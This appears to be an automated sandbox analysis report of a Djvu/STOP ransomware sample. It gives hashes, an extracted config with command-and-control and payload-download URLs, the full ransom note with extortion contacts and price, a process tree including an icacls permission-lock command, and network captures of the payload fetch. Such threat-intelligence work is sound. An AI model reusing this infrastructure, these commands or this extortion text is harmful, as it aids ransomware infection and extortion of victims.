Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
06/09/2022, 20:01 UTC
General
-
Target
a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
-
Size
777KB
-
MD5
20f2afd8da63e9a7c46c6ac70abfe9bc
-
SHA1
0a95131b75f6554950010efd7443b080495b5369
-
SHA256
a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a
-
SHA512
5f6caebdcefd378b320261e0750d157b4efd42b723dd0fc4fe13fb7987d1a1eed2721992ef717a380ff7dacb711a30f3f88ce4062ad9de10de7bd708c799eb28
-
SSDEEP
24576:ouXXgnnnWiA41Kw9kYWHXle6+jhqFlc9vKFQ/fdtT:ouEbN1YnHX9+NqU3/fLT
Malware Config
Extracted
djvu
http://acacaca.org/test1/get.php
-
extension
.mmpu
-
offline_id
yd6oYv6aBN90yFzTWdZ34sXSXtXiauzOLXZyWht1
-
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-xuPJqoyzQE Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0554Jhyjd
Signatures
-
Detected Djvu ransomware 9 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of WriteProcessMemory 26 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\9e4a3527-6bfd-4bdb-b910-49b1a73d0070" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
Network
-
DNSapi.2ip.uaRemote address:8.8.8.8:53Requestapi.2ip.uaIN AResponseapi.2ip.uaIN A162.0.217.254 -
GEThttps://api.2ip.ua/geo.jsonRemote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Date: Tue, 06 Sep 2022 20:03:03 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
GEThttps://api.2ip.ua/geo.jsonRemote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Date: Tue, 06 Sep 2022 20:04:16 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
DNSrgyui.topRemote address:8.8.8.8:53Requestrgyui.topIN AResponsergyui.topIN A210.182.29.70rgyui.topIN A138.36.3.134rgyui.topIN A41.41.255.235rgyui.topIN A222.232.238.243rgyui.topIN A109.98.58.98rgyui.topIN A109.102.255.230rgyui.topIN A175.126.109.15rgyui.topIN A1.248.122.240rgyui.topIN A211.119.84.112rgyui.topIN A196.200.111.5
-
DNSacacaca.orgRemote address:8.8.8.8:53Requestacacaca.orgIN AResponseacacaca.orgIN A175.126.109.15acacaca.orgIN A196.200.111.5acacaca.orgIN A185.95.186.58acacaca.orgIN A210.182.29.70acacaca.orgIN A222.236.49.123acacaca.orgIN A190.140.74.43acacaca.orgIN A211.171.233.129acacaca.orgIN A109.98.58.98acacaca.orgIN A189.153.246.166acacaca.orgIN A211.171.233.126
-
GEThttp://rgyui.top/dl/build2.exeRemote address:210.182.29.70:80RequestGET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: rgyui.top
ResponseHTTP/1.1 200 OK
Date: Tue, 06 Sep 2022 20:04:17 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
Last-Modified: Tue, 06 Sep 2022 10:20:50 GMT
ETag: "5fe00-5e7ff8ce68f9f"
Accept-Ranges: bytes
Content-Length: 392704
Connection: close
Content-Type: application/octet-stream
-
GEThttp://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=trueRemote address:175.126.109.15:80RequestGET /test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: acacaca.org
-
8.253.183.120:80
-
93.184.220.29:80
-
20.42.73.25:443
-
8.253.183.120:80
-
8.253.183.120:80
-
8.253.183.120:80
-
162.0.217.254:443https://api.2ip.ua/geo.jsontls, http
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
162.0.217.254:443https://api.2ip.ua/geo.jsontls, http
HTTP Request
GET https://api.2ip.ua/geo.jsonHTTP Response
429 -
210.182.29.70:80http://rgyui.top/dl/build2.exehttp
HTTP Request
GET http://rgyui.top/dl/build2.exeHTTP Response
200 -
175.126.109.15:80http://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=truehttp
HTTP Request
GET http://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true
-
8.8.8.8:53api.2ip.uadns
DNS Request
api.2ip.ua
DNS Response
162.0.217.254
-
8.8.8.8:53rgyui.topdns
DNS Request
rgyui.top
DNS Response
210.182.29.70138.36.3.13441.41.255.235222.232.238.243109.98.58.98109.102.255.230175.126.109.151.248.122.240211.119.84.112196.200.111.5
-
8.8.8.8:53acacaca.orgdns
DNS Request
acacaca.org
DNS Response
175.126.109.15196.200.111.5185.95.186.58210.182.29.70222.236.49.123190.140.74.43211.171.233.129109.98.58.98189.153.246.166211.171.233.126
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59cd19ed49787d5bf969ac81a2dbf7ce9
SHA14ff7b3372f9778f210014bdd7989d6f9442caa37
SHA2565e317a2565c34c5d13efedd5a58537a9f255df17457a567e5fcc061962475b22
SHA512589a98c719b6f67e875cc05438d4801d8025e8661bc30d51351df864314f0f4e5f35aa27422954a43eddd9ca04903043b46a47335311586f709e8eeae87cf7b9
-
Filesize
1KB
MD57c27ffae0cbd6d55b86f387667635294
SHA16df10a537a970852086711da85ae84f7355bff72
SHA256b6a9400010fea1af51104c2b48fdd4383d8b7a81bd62a22c188db3cdb7413503
SHA512140752fd448ed5cd01c5463d67b7dd2c5c111fd4256d3686b792bc0ff788bed49fdfe901402fdb080b9a6c0789725dda6256280120fadc5aca1f127a552e13d6
-
Filesize
488B
MD53b42d0c5ae1827fc0345b08a2941b727
SHA17c722355285918e5c67e9f6705ffcd922c5920fe
SHA256a495a729047a31254e7869f10f963327a009e9905ddb1780a1746d6c8dae57d3
SHA5127eab4c2641cc4996731ec6cf65454f790c192a5e46df9ea1c46cd223bbbf0dbea2412abe5e952208ab836c60b56f9b3df56b894b09f9585b8ba4a4054bea3511
-
Filesize
482B
MD56c9b64bc966dfe7725273ae6644572f9
SHA1fce1f9c3e7f5a2b31f02d90c83f4ed8e8ceddbff
SHA256e291a0be5aaf882589b8b763faaf449ac580369ca07f644d3273430b9a6d4daf
SHA512174b2cc7636cc304dcbc708e809107c3a82d8e45b79cd1b6265627c466a77a647bc2c89e44474be10ddf0bb95842546942ce032b5fde72973bd6c33241c2d3f8
-
Filesize
777KB
MD520f2afd8da63e9a7c46c6ac70abfe9bc
SHA10a95131b75f6554950010efd7443b080495b5369
SHA256a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a
SHA5125f6caebdcefd378b320261e0750d157b4efd42b723dd0fc4fe13fb7987d1a1eed2721992ef717a380ff7dacb711a30f3f88ce4062ad9de10de7bd708c799eb28
-
Filesize
580KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.1MB
-
Filesize
580KB
-
Filesize
1.2MB
-
Filesize
1.2MB
-
Filesize
1.2MB